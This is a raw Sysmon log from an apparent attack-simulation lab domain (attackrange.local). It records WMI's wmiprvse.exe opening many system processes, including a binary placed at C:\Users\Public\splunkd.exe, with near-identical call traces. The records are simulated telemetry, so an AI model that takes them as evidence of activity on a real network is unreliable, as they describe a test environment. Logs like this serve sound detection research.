Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025456Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025455Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025454Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025453Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025452Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025451Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025450Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025449Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025448Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025447Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025446Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025445Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025444Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025443Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025442Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025441Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025440Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025439Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025438Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025437Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 